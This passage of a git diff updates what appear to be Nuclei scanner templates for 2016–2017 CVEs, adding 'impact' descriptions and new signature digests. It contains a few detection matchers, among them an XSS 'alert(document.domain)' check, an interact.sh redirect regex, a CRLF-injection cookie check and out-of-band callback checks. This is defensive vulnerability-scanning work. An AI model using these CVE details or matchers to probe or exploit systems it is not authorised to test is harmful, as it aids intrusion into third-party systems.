           - 'contains(body_2, "<th scope=\"row\" class=\"check-column\">")'
           - '!contains(body_3, "<th scope=\"row\" class=\"check-column\">")'
         condition: and
-# digest: 490a004630440220714ca1e2b5886b9ebfedbdc8f204f5be9d60f2ce552b068a2701ef850104a9cf022022beba3194fe4e6a207e8e67ee745ffe06b24920ee1cf2f4d50a59d0addab407:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204099362396e4555f69a7d4857f74ae698a03b3a5db8e54ed829fe71f978db7b6022009679cac44f3f593de368fb42709d1018d3d4d72252df240752b4b83c148803f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml
index 0d684bea26..d396db3da2 100644
--- a/http/cves/2016/CVE-2016-10956.yaml
+++ b/http/cves/2016/CVE-2016-10956.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo,0x240x23elu
   severity: high
   description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         status:
           - 200
           - 500
-# digest: 4b0a00483046022100a4fc8befd627e29636b1eb8d2155525344e1b1b3ad38ec471e7367d8e0f11615022100efe6673d75279312da4411012c154b1c622c92dec79b0c5da0de70851c324961:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210090fbf657cf742c244be5eb71d3d735e6aaf25d063cc01129a2e5cfb39fff64b402210087b3728da8dcd11eb4bcde14bd79437131f078ba412cf6096f2ee6e53e7f3820:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml
index 19f0e71717..10e466d89e 100644
--- a/http/cves/2016/CVE-2016-10960.yaml
+++ b/http/cves/2016/CVE-2016-10960.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
   remediation: |
     Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022072c8ca7f838d6b539c2734da38594e103b483582ab5b579e3ee665d7ac4a1531022100dca231d274ed5aa8574145974d908f4011cf0597a7a8647ae3078f952c21e054:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202bb949a9a1b2979e231b1722247bfaffe20ce9a18ef186b924814fd84f5ab86a0221009467ecb13104dec66e04313a27f421cf9e50ff0827a0be2ddf670ddaafa3ab72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml
index 65543a450c..c01f06744c 100644
--- a/http/cves/2016/CVE-2016-10973.yaml
+++ b/http/cves/2016/CVE-2016-10973.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "tab = alert(document.domain);")'
           - 'contains(body_2, "Brafton Article Loader")'
         condition: and
-# digest: 4b0a00483046022100ea9a12265b4d6d6f114c5d6266b33c2725ee926c56a20439288bc6593a9375f6022100867fec55b47aab973f5debecfe39e6f133ed0a315434e246702234cd35b48173:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220274c8fe4864f25f22fde055c7b74f729cbd20ad92e09493514b7e5eafce9593f022040e51a5e6f0350c7fae9de1ecbe382c2cfb9fbc97f9dfb9c2db2682a23c2891f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml
index 0a4f76f709..7989e9ea0d 100644
--- a/http/cves/2016/CVE-2016-10993.yaml
+++ b/http/cves/2016/CVE-2016-10993.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100915ccd334c2855595153226aa748a12aa38d949586e117ffac28895b02f483170221009fb77198a6dd92c7d1e86b5e4ebafb332ee94418821edaf5d9712cd817fb4fd3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c130b02b2c3077341b11b3775c603b866d01c2a6caf462f0cc86a128710fb337022100894c39e5ef40da3e7381fb475feb380e4cc1a4411899df892855bf7bd33a63f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml
index c59aef6189..b8989212d7 100644
--- a/http/cves/2016/CVE-2016-1555.yaml
+++ b/http/cves/2016/CVE-2016-1555.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a0047304502205f15f24279a3086b6fdcde410415f69cea354f9c61cc8447928090e38ab5207b022100cc742057a382c9b79537f7394adb8f06d72af594025b101ba6e3959546737b1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022077431a2a530eaa3b19530f844f0a1c78d83d407a677d6a966ba3860fc99a1bb7022100b0519172142aebe889875162f4cf33b796a8ae6bc585ec0126e608a652318921:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml
index a4f45e6e84..d4a93e0e45 100644
--- a/http/cves/2016/CVE-2016-2389.yaml
+++ b/http/cves/2016/CVE-2016-2389.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: |
     Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200179e8cbaef3488e4932205f1a20bdc92481bd2a464e2dada1e495b91ac134c5022100b98790cb14625be7eccb87dc95c4272b395c16772ff2ebd78930ce2d405b39a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220509d3f8ae3ae615f3416ca9592bf7c89dbb4dbf02aef851d67b1011dbc51bbf8022100f0bd4f4fe6fd93a9128738a3ce0f331f01ac75012352d36d396a5236d4815a05:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml
index 83283144fd..e2f2668964 100644
--- a/http/cves/2016/CVE-2016-3081.yaml
+++ b/http/cves/2016/CVE-2016-3081.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
+  impact: |
+    Remote code execution
   remediation: |
     Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1.
   reference:
@@ -43,5 +45,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100e1ebb3fae89d1a5b8795fb26f9e2008383a7f2f10ab577194335edced597b9a102205f1d835e9210ebfbf66167945cf13b6b6c4e4aae07edf9e4eb6a03b8be24de8c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204b3f24fac8ad7e6ba5afae75c8936e7a39429255f8d9c7ec4fe849b7ef43db3f022100da3fef226f57f81f1761c6b8bae43517e38284716a3a32657453c7e23e5de09a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml
index a1cd41ca9f..57bd1ccfb3 100644
--- a/http/cves/2016/CVE-2016-3088.yaml
+++ b/http/cves/2016/CVE-2016-3088.yaml
@@ -5,6 +5,8 @@ info:
   author: fq_hsu
   severity: critical
   description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
+  impact: |
+    An attacker can write arbitrary files on the server, potentially leading to remote code execution.
   remediation: |
     Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - "status_code_2==200"
           - "contains((body_2), '{{rand1}}')"
         condition: and
-# digest: 490a004630440220494aaa9509d2a74ac52e74622b1a178598267023ed71ffd954c4245983858ec802202d4e208030c71412b86e979b75f30c4e3d0b03bea5620bcd645bc9cb1064098d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022001ecfed66bc4ca0efb31a68cbc4a3300c51e08e6e4aeb3bb06de1ece1d899a5d0220072340e6dbdb8d59c5ec882a0f8399de19f46c7627bc1d71141d28e44b8f4f9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml
index 390fd75809..8b1d247367 100644
--- a/http/cves/2016/CVE-2016-3978.yaml
+++ b/http/cves/2016/CVE-2016-3978.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft.
   remediation: |
     Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100ec615a8a6a911ac9ef5114d038bdd327a760e46c9fc165e1ec76ab9378b22bf302201595a3156f4d2fcc1e30612b362bd54b1a091951f1aefab515e8e42f92ac3aa4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022064c0ba89484715a2648d7b4e1b5e4c96a615f57e4559aa4712cd1c31edad4110022058abb2a9ba5472ffadadca662462dae939d740f2b676491d91ce372a351a422e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml
index c430596b5a..c50ecad77e 100644
--- a/http/cves/2016/CVE-2016-4437.yaml
+++ b/http/cves/2016/CVE-2016-4437.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
+  impact: |
+    Remote code execution
   remediation: |
     Upgrade to a patched version of Apache Shiro
   reference:
@@ -41,5 +43,4 @@ http:
         part: interactsh_protocol
         words:
           - dns
-
-# digest: 4a0a0047304502200cbc5b2041fd7afe2b7885d370b01cc75256622b7555f4694b7e7f0640988fb7022100cead9be5ab42f847ebf423a34e06b00f0e1bc157fef87ed185a5743ca406299b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d6e9353a94ac258937539ed8ff40241674ca73fa8e78941808d2afb343bbb3ce0220533a4998d8ddd00b6627f06783d8a74f2ad7757a0b0b77ac31e1f5dc50898143:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml
index 997c1499b4..0d8034c3b6 100644
--- a/http/cves/2016/CVE-2016-4975.yaml
+++ b/http/cves/2016/CVE-2016-4975.yaml
@@ -5,6 +5,8 @@ info:
   author: melbadry9,nadino,xElkomy
   severity: medium
   description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
+  impact: |
+    Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning.
   remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
   reference:
     - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
-# digest: 4b0a00483046022100996081e37869843f800b09d2aaf1b4031251acc4ac5c89ca00d4a35416a4b158022100b77779a8ba52c26337bedeac1634e3752723b0faa5bcaa9fa9dd1014906f0c47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201e3d7b1750ea0331f37c87bdb7116e1196954a17c7399a700bf4282b0096b8e102200ffa21c484c0c36e220ad3c635a98bf45206dc33745bcfc70b6d117ccf0d0410:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml
index dc2387f3d6..a1d54ee5da 100644
--- a/http/cves/2016/CVE-2016-4977.yaml
+++ b/http/cves/2016/CVE-2016-4977.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: high
   description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
   remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
   reference:
     - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 490a00463044022076c8bfc609561bca272ea7837022cc8fc3d6063400c60583ea653426a7e2b36e02202d6849f8ba179919a02b9150bdcccc2f622663cdeb26876f13938bab9c605b9b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ff1e44479b41d4d85fcab05aecb6554934e8ff786e17b401c4fe8d4e05c11291022023d6dfecd2d793de4c86b693a4dae0dafd48f1f50f0a637a5246de292bbcc080:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml
index 86f2eb7ba0..f7ee34440c 100644
--- a/http/cves/2016/CVE-2016-5649.yaml
+++ b/http/cves/2016/CVE-2016-5649.yaml
@@ -5,6 +5,8 @@ info:
   author: suman_kar
   severity: critical
   description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
+  impact: |
+    An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
   remediation: |
     Update the router firmware to the latest version, which includes a fix for the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
         regex:
           - '<b>Success "([a-z]+)"'
         part: body
-# digest: 4b0a00483046022100d787ee67c60b8f8b09f813ee099409adeedcf3d52f068938c73a72e82943ebb1022100ecb03cec920d5c419016145556addfbb821efbd113fd1b8c4719bdd9d2f06a25:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210096367ea3f8f0ad001aa17817e08f20ccb7fbcb41bc231665852f37d48b3efb3902210087d012ddefb1b99db5fe84e51863aa90315b368ef9dd249da7cbf53747766195:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml
index 30a883c950..45ac6e5af8 100644
--- a/http/cves/2016/CVE-2016-6195.yaml
+++ b/http/cves/2016/CVE-2016-6195.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
   reference:
@@ -54,4 +56,4 @@ http:
           - 200
           - 503
         condition: or
-# digest: 4b0a00483046022100e3eec4c06a725ca810e4055a865bd1707314cd5875386748737c17442c29b2c60221009a06fbdc88d5332b64aaaa5261fe28278df3bcd8b16b9ea21dd6cfe6e1a61e5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022062d8b9c1d7cfb77bc85c8ae92a77df9725867da724d8cb70c78a625caf2b9bef022100ea23f4abaafd298853cd237e31aa79490cddd8d986670715083a4a7c355c8204:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml
index 01a08ba3bf..ba2ec75bcc 100644
--- a/http/cves/2016/CVE-2016-6277.yaml
+++ b/http/cves/2016/CVE-2016-6277.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to unauthorized access, data theft, or network compromise.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206e595bee4a9625439b4571e90c01d2283c18727ee3ded0ba304fc32e1afc5146022100b57e59cf5f9038699e056e1d45131b0787a026148b067ce4ce0b8fe6f73fbe4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d046569d3f45081a6d1082690bb763f2bb9471d9edd05d604e2ae025332a580602206ac62f4933c99a8b9ce07fbe940d958cb4be3dbeb94bc7b926cf5e151ae0199f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml
index b5b7564c27..34864c7675 100644
--- a/http/cves/2016/CVE-2016-6601.yaml
+++ b/http/cves/2016/CVE-2016-6601.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
   remediation: |
     Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100afbfcd16966f05ea2fcaacee747e1dc1ceed499bc73e96e211f3cdf76dba2c0302204264e82a70862a32a404e800be488075f0f6ac65495a8b2ac73a3774bf13757c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d6a7ed251426703aece365dfadf76c52c44897b708b13b969186c99ed609e3c20220135818f70a4e9778d4d2a4814d6211881eb74797518681bd61b62c2701636334:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml
index dade765376..a0a5ec289d 100644
--- a/http/cves/2016/CVE-2016-7552.yaml
+++ b/http/cves/2016/CVE-2016-7552.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a  directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the appliance.
   remediation: |
     Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207ceb5730d987cc31fbe159b26d1db09de118ccc45c9287db85c5ec0e9bddd3a2022100f96c2537509794a887c6899a2f3d17eb23a80f7f848616400065e626343b7167:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cfb1ffcfa7ecbc13c10c247b31827b1c2b9fbec1e77083749f67234c1a72d5f302210080f97a2c70380af5c9d3824e75ce79dab5c4da9902df724f8a81462a849880cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml
index 2d40348180..6b636062db 100644
--- a/http/cves/2016/CVE-2016-7834.yaml
+++ b/http/cves/2016/CVE-2016-7834.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
+  impact: |
+    An attacker can gain unauthorized access to the camera and potentially control its functions.
   remediation: |
     Upgrade to the latest version of the firmware provided by Sony.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 204
-# digest: 4a0a00473045022100d46dc2d1dc6c1c894ac148bb4aa6faf2a32a6f310d6fd79c30e39d689ea01b93022068126eb3da005ad3bf3ee3c82460338481a1a1d031edd54112c099ec8a6b2d5a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082d3f0d6de5c0422935c4d3732ceaeabdd14ec72112f94834449d829812eea3802202d4b2a08ef863c1b6b7e6e4d2aaaaa7b0e88b9ae60aa9d821bb214529a8b26a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml
index d2d063ee1b..3e1c0bef30 100644
--- a/http/cves/2016/CVE-2016-7981.yaml
+++ b/http/cves/2016/CVE-2016-7981.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser.
   remediation: |
     Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d33738c81f1b35258fc637b24d6b1bdde8405e4043aa5f90f2aafe19beffc7a0022037aed155ff8de44d6e23cb7cca576979a3acdc7b51568a5baafc32889aadff60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ee6d69587f3d7e7744647a2123e2584e4efbb250643f5afd79e8583815d3c4d102203ae76d70671a78c809781a3b9b3efa56e2c602f9dbf3f8bbd3a2c0a80200dab3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml
index 63fea3e921..db4256e76a 100644
--- a/http/cves/2016/CVE-2016-8527.yaml
+++ b/http/cves/2016/CVE-2016-8527.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d8ba2dc245dfcce9b9281971dd8847b12fd0e2da5eff1d8fce9637f9e9ed8e150221008d814343e3252cac0ec416831b4258aed224ab4bfa83179633aae9492fa7c6d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012b0a1141fcca2a9e54f57e313f4182fa6798e6f2af153936548f7673366e6dd0221009e7da651f3ed1adaf7b19fc60ec6d3c0763929638bffc85cd0ac398e59e83303:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml
index 2ab2315bbe..49bbb457df 100644
--- a/http/cves/2017/CVE-2017-0929.yaml
+++ b/http/cves/2017/CVE-2017-0929.yaml
@@ -5,6 +5,8 @@ info:
   author: charanrayudu,meme-lord
   severity: high
   description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
+  impact: |
+    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
   remediation: |
     Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a004630440220047248363f5670c5af030ce90f83b623b0ccf2be426942b9e93f4d08eaef132802204b896d409cb4c742f3725283e579e15b7994becae649c0c458a28952d1a653a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ff0b79bc31995c8c892a88c73b4b8e39e6127e1c68e0b7c55088bbd0a0b98b47022100eb467d39ef61c66d326e7c0e70c7ab0055c54bc06e9fe007641bb1fb0b3ca8e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml
index 445aefc725..45a25120e1 100644
--- a/http/cves/2017/CVE-2017-1000029.yaml
+++ b/http/cves/2017/CVE-2017-1000029.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022040abe486b4d9478c19246b5e0c5c0dc3e39f52153f0dec74b7c3e689bc57411f022100a9bb22e22cad9236a3e5c741a72cdfa12d6b271b797394b1eedbe764f5314a63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ebc2b52d2664bfdc3c2a5c0b60ba397dd2ea8df1deb6790fc6e05369babb1967022015da87e67f15d57df93eedd88ce24a06b02b4c6f6e355b6479d1a0020d9be3f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml
index 5285a61759..2a7e1cab0b 100644
--- a/http/cves/2017/CVE-2017-1000163.yaml
+++ b/http/cves/2017/CVE-2017-1000163.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
